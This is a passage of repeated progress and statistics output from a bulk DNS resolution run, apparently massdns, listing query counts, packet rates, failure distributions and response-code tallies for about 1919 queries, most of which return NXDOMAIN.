1724Failures: 0: 18.03%, 1: 27.36%, 2: 24.53%, 3: 14.68%, 4: 7.34%, 5: 4.09%, 6: 1.99%, 7: 1.62%, 8: 0.63%, 9: 0.21%, 10: 0.10%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1725Response: | Success: | Total:
1726OK: | 160 ( 8.39%) | 174 ( 5.89%)
1727NXDOMAIN: | 1705 ( 89.36%) | 1950 ( 66.03%)
1728SERVFAIL: | 43 ( 2.25%) | 45 ( 1.52%)
1729REFUSED: | 0 ( 0.00%) | 784 ( 26.55%)
1730FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1731
1732
1733
1734Processed queries: 1919
1735Received packets: 2991
1736Progress: 100.00% (00 h 00 min 05 sec / 00 h 00 min 05 sec)
1737Current incoming rate: 25 pps, average: 597 pps
1738Current success rate: 7 pps, average: 382 pps
1739Finished total: 1916, success: 1916 (100.00%)
1740Mismatched domains: 338 (11.35%), IDs: 0 (0.00%)
1741Failures: 0: 17.95%, 1: 27.24%, 2: 24.43%, 3: 14.61%, 4: 7.31%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.37%, 10: 0.10%, 11: 0.05%, 12: 0.05%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1742Response: | Success: | Total:
1743OK: | 161 ( 8.40%) | 175 ( 5.87%)
1744NXDOMAIN: | 1712 ( 89.35%) | 1972 ( 66.20%)
1745SERVFAIL: | 43 ( 2.24%) | 45 ( 1.51%)
1746REFUSED: | 0 ( 0.00%) | 786 ( 26.38%)
1747FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1748
1749
1750
1751Processed queries: 1919
1752Received packets: 2999
1753Progress: 100.00% (00 h 00 min 06 sec / 00 h 00 min 06 sec)
1754Current incoming rate: 7 pps, average: 498 pps
1755Current success rate: 1 pps, average: 319 pps
1756Finished total: 1918, success: 1918 (100.00%)
1757Mismatched domains: 343 (11.48%), IDs: 0 (0.00%)
1758Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1759Response: | Success: | Total:
1760OK: | 161 ( 8.39%) | 175 ( 5.86%)
1761NXDOMAIN: | 1714 ( 89.36%) | 1977 ( 66.19%)
1762SERVFAIL: | 43 ( 2.24%) | 45 ( 1.51%)
1763REFUSED: | 0 ( 0.00%) | 789 ( 26.41%)
1764FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1765
1766
1767
1768Processed queries: 1919
1769Received packets: 3001
1770Progress: 100.00% (00 h 00 min 07 sec / 00 h 00 min 07 sec)
1771Current incoming rate: 1 pps, average: 427 pps
1772Current success rate: 0 pps, average: 273 pps
1773Finished total: 1918, success: 1918 (100.00%)
1774Mismatched domains: 345 (11.54%), IDs: 0 (0.00%)
1775Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.05%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1776Response: | Success: | Total:
1777OK: | 161 ( 8.39%) | 175 ( 5.85%)
1778NXDOMAIN: | 1714 ( 89.36%) | 1978 ( 66.18%)
1779SERVFAIL: | 43 ( 2.24%) | 46 ( 1.54%)
1780REFUSED: | 0 ( 0.00%) | 789 ( 26.40%)
1781FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1782
1783
1784
1785Processed queries: 1919
1786Received packets: 3006
1787Progress: 100.00% (00 h 00 min 08 sec / 00 h 00 min 08 sec)
1788Current incoming rate: 4 pps, average: 375 pps
1789Current success rate: 0 pps, average: 239 pps
1790Finished total: 1918, success: 1918 (100.00%)
1791Mismatched domains: 350 (11.69%), IDs: 0 (0.00%)
1792Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.05%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1793Response: | Success: | Total:
1794OK: | 161 ( 8.39%) | 175 ( 5.85%)
1795NXDOMAIN: | 1714 ( 89.36%) | 1980 ( 66.13%)
1796SERVFAIL: | 43 ( 2.24%) | 48 ( 1.60%)
1797REFUSED: | 0 ( 0.00%) | 790 ( 26.39%)
1798FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1799
1800
1801
1802Processed queries: 1919
1803Received packets: 3011
1804Progress: 100.00% (00 h 00 min 09 sec / 00 h 00 min 09 sec)
1805Current incoming rate: 4 pps, average: 333 pps
1806Current success rate: 0 pps, average: 212 pps
1807Finished total: 1918, success: 1918 (100.00%)
1808Mismatched domains: 355 (11.84%), IDs: 0 (0.00%)
1809Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.05%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1810Response: | Success: | Total:
1811OK: | 161 ( 8.39%) | 175 ( 5.84%)
1812NXDOMAIN: | 1714 ( 89.36%) | 1981 ( 66.06%)
1813SERVFAIL: | 43 ( 2.24%) | 51 ( 1.70%)
1814REFUSED: | 0 ( 0.00%) | 791 ( 26.38%)
1815FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1816
1817
1818
1819Processed queries: 1919
1820Received packets: 3015
1821Progress: 100.00% (00 h 00 min 10 sec / 00 h 00 min 10 sec)
1822Current incoming rate: 3 pps, average: 300 pps
1823Current success rate: 0 pps, average: 191 pps
1824Finished total: 1918, success: 1918 (100.00%)
1825Mismatched domains: 359 (11.95%), IDs: 0 (0.00%)
1826Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.05%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1827Response: | Success: | Total:
1828OK: | 161 ( 8.39%) | 175 ( 5.83%)
1829NXDOMAIN: | 1714 ( 89.36%) | 1981 ( 65.97%)
1830SERVFAIL: | 43 ( 2.24%) | 54 ( 1.80%)
1831REFUSED: | 0 ( 0.00%) | 792 ( 26.37%)
1832FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1833
1834
1835
1836Processed queries: 1919
1837Received packets: 3019
1838Progress: 100.00% (00 h 00 min 11 sec / 00 h 00 min 11 sec)
1839Current incoming rate: 3 pps, average: 273 pps
1840Current success rate: 0 pps, average: 174 pps
1841Finished total: 1918, success: 1918 (100.00%)
1842Mismatched domains: 363 (12.07%), IDs: 0 (0.00%)
1843Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.05%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1844Response: | Success: | Total:
1845OK: | 161 ( 8.39%) | 175 ( 5.82%)
1846NXDOMAIN: | 1714 ( 89.36%) | 1982 ( 65.91%)
1847SERVFAIL: | 43 ( 2.24%) | 56 ( 1.86%)
1848REFUSED: | 0 ( 0.00%) | 793 ( 26.37%)
1849FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1850
1851
1852
1853Processed queries: 1919
1854Received packets: 3021
1855Progress: 100.00% (00 h 00 min 12 sec / 00 h 00 min 12 sec)
1856Current incoming rate: 1 pps, average: 251 pps
1857Current success rate: 0 pps, average: 159 pps
1858Finished total: 1918, success: 1918 (100.00%)
1859Mismatched domains: 365 (12.13%), IDs: 0 (0.00%)
1860Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.05%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1861Response: | Success: | Total:
1862OK: | 161 ( 8.39%) | 176 ( 5.85%)
1863NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.90%)
1864SERVFAIL: | 43 ( 2.24%) | 56 ( 1.86%)
1865REFUSED: | 0 ( 0.00%) | 793 ( 26.35%)
1866FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1867
1868
1869
1870Processed queries: 1919
1871Received packets: 3021
1872Progress: 100.00% (00 h 00 min 13 sec / 00 h 00 min 13 sec)
1873Current incoming rate: 0 pps, average: 231 pps
1874Current success rate: 0 pps, average: 147 pps
1875Finished total: 1918, success: 1918 (100.00%)
1876Mismatched domains: 365 (12.13%), IDs: 0 (0.00%)
1877Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.05%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1878Response: | Success: | Total:
1879OK: | 161 ( 8.39%) | 176 ( 5.85%)
1880NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.90%)
1881SERVFAIL: | 43 ( 2.24%) | 56 ( 1.86%)
1882REFUSED: | 0 ( 0.00%) | 793 ( 26.35%)
1883FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1884
1885
1886
1887Processed queries: 1919
1888Received packets: 3022
1889Progress: 100.00% (00 h 00 min 14 sec / 00 h 00 min 14 sec)
1890Current incoming rate: 0 pps, average: 215 pps
1891Current success rate: 0 pps, average: 136 pps
1892Finished total: 1918, success: 1918 (100.00%)
1893Mismatched domains: 366 (12.16%), IDs: 0 (0.00%)
1894Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.05%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1895Response: | Success: | Total:
1896OK: | 161 ( 8.39%) | 176 ( 5.85%)
1897NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.88%)
1898SERVFAIL: | 43 ( 2.24%) | 56 ( 1.86%)
1899REFUSED: | 0 ( 0.00%) | 794 ( 26.38%)
1900FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1901
1902
1903
1904Processed queries: 1919
1905Received packets: 3025
1906Progress: 100.00% (00 h 00 min 15 sec / 00 h 00 min 15 sec)
1907Current incoming rate: 2 pps, average: 201 pps
1908Current success rate: 0 pps, average: 127 pps
1909Finished total: 1918, success: 1918 (100.00%)
1910Mismatched domains: 369 (12.25%), IDs: 0 (0.00%)
1911Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.05%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1912Response: | Success: | Total:
1913OK: | 161 ( 8.39%) | 176 ( 5.84%)
1914NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.81%)
1915SERVFAIL: | 43 ( 2.24%) | 57 ( 1.89%)
1916REFUSED: | 0 ( 0.00%) | 796 ( 26.42%)
1917FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1918
1919
1920
1921Processed queries: 1919
1922Received packets: 3027
1923Progress: 100.00% (00 h 00 min 16 sec / 00 h 00 min 16 sec)
1924Current incoming rate: 1 pps, average: 188 pps
1925Current success rate: 0 pps, average: 119 pps
1926Finished total: 1918, success: 1918 (100.00%)
1927Mismatched domains: 370 (12.28%), IDs: 0 (0.00%)
1928Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.05%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1929Response: | Success: | Total:
1930OK: | 161 ( 8.39%) | 176 ( 5.84%)
1931NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.79%)
1932SERVFAIL: | 43 ( 2.24%) | 57 ( 1.89%)
1933REFUSED: | 0 ( 0.00%) | 797 ( 26.44%)
1934FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1935
1936
1937
1938Processed queries: 1919
1939Received packets: 3028
1940Progress: 100.00% (00 h 00 min 17 sec / 00 h 00 min 17 sec)
1941Current incoming rate: 0 pps, average: 177 pps
1942Current success rate: 0 pps, average: 112 pps
1943Finished total: 1918, success: 1918 (100.00%)
1944Mismatched domains: 371 (12.31%), IDs: 0 (0.00%)
1945Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.05%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1946Response: | Success: | Total:
1947OK: | 161 ( 8.39%) | 176 ( 5.84%)
1948NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.77%)
1949SERVFAIL: | 43 ( 2.24%) | 57 ( 1.89%)
1950REFUSED: | 0 ( 0.00%) | 798 ( 26.47%)
1951FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1952
1953
1954
1955Processed queries: 1919
1956Received packets: 3029
1957Progress: 100.00% (00 h 00 min 18 sec / 00 h 00 min 18 sec)
1958Current incoming rate: 0 pps, average: 167 pps
1959Current success rate: 0 pps, average: 106 pps
1960Finished total: 1918, success: 1918 (100.00%)
1961Mismatched domains: 372 (12.33%), IDs: 0 (0.00%)
1962Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.05%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1963Response: | Success: | Total:
1964OK: | 161 ( 8.39%) | 176 ( 5.84%)
1965NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.75%)
1966SERVFAIL: | 43 ( 2.24%) | 57 ( 1.89%)
1967REFUSED: | 0 ( 0.00%) | 799 ( 26.49%)
1968FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1969
1970
1971
1972Processed queries: 1919
1973Received packets: 3030
1974Progress: 100.00% (00 h 00 min 19 sec / 00 h 00 min 19 sec)
1975Current incoming rate: 0 pps, average: 159 pps
1976Current success rate: 0 pps, average: 100 pps
1977Finished total: 1918, success: 1918 (100.00%)
1978Mismatched domains: 373 (12.36%), IDs: 0 (0.00%)
1979Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.05%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1980Response: | Success: | Total:
1981OK: | 161 ( 8.39%) | 176 ( 5.83%)
1982NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.73%)
1983SERVFAIL: | 43 ( 2.24%) | 57 ( 1.89%)
1984REFUSED: | 0 ( 0.00%) | 800 ( 26.52%)
1985FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1986
1987
1988
1989Processed queries: 1919
1990Received packets: 3032
1991Progress: 100.00% (00 h 00 min 20 sec / 00 h 00 min 20 sec)
1992Current incoming rate: 1 pps, average: 151 pps
1993Current success rate: 0 pps, average: 95 pps
1994Finished total: 1918, success: 1918 (100.00%)
1995Mismatched domains: 375 (12.42%), IDs: 0 (0.00%)
1996Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.05%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1997Response: | Success: | Total:
1998OK: | 161 ( 8.39%) | 176 ( 5.83%)
1999NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.68%)
2000SERVFAIL: | 43 ( 2.24%) | 57 ( 1.89%)
2001REFUSED: | 0 ( 0.00%) | 802 ( 26.57%)
2002FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
2003
2004
2005
2006Processed queries: 1919
2007Received packets: 3034
2008Progress: 100.00% (00 h 00 min 21 sec / 00 h 00 min 21 sec)
2009Current incoming rate: 1 pps, average: 144 pps
2010Current success rate: 0 pps, average: 91 pps
2011Finished total: 1918, success: 1918 (100.00%)
2012Mismatched domains: 377 (12.48%), IDs: 0 (0.00%)
2013Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.05%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
2014Response: | Success: | Total:
2015OK: | 161 ( 8.39%) | 176 ( 5.83%)
2016NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.64%)
2017SERVFAIL: | 43 ( 2.24%) | 58 ( 1.92%)
2018REFUSED: | 0 ( 0.00%) | 803 ( 26.58%)
2019FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
2020
2021
2022
2023Processed queries: 1919
2024Received packets: 3036
2025Progress: 100.00% (00 h 00 min 22 sec / 00 h 00 min 22 sec)
2026Current incoming rate: 1 pps, average: 137 pps
2027Current success rate: 0 pps, average: 87 pps
2028Finished total: 1918, success: 1918 (100.00%)
2029Mismatched domains: 379 (12.54%), IDs: 0 (0.00%)
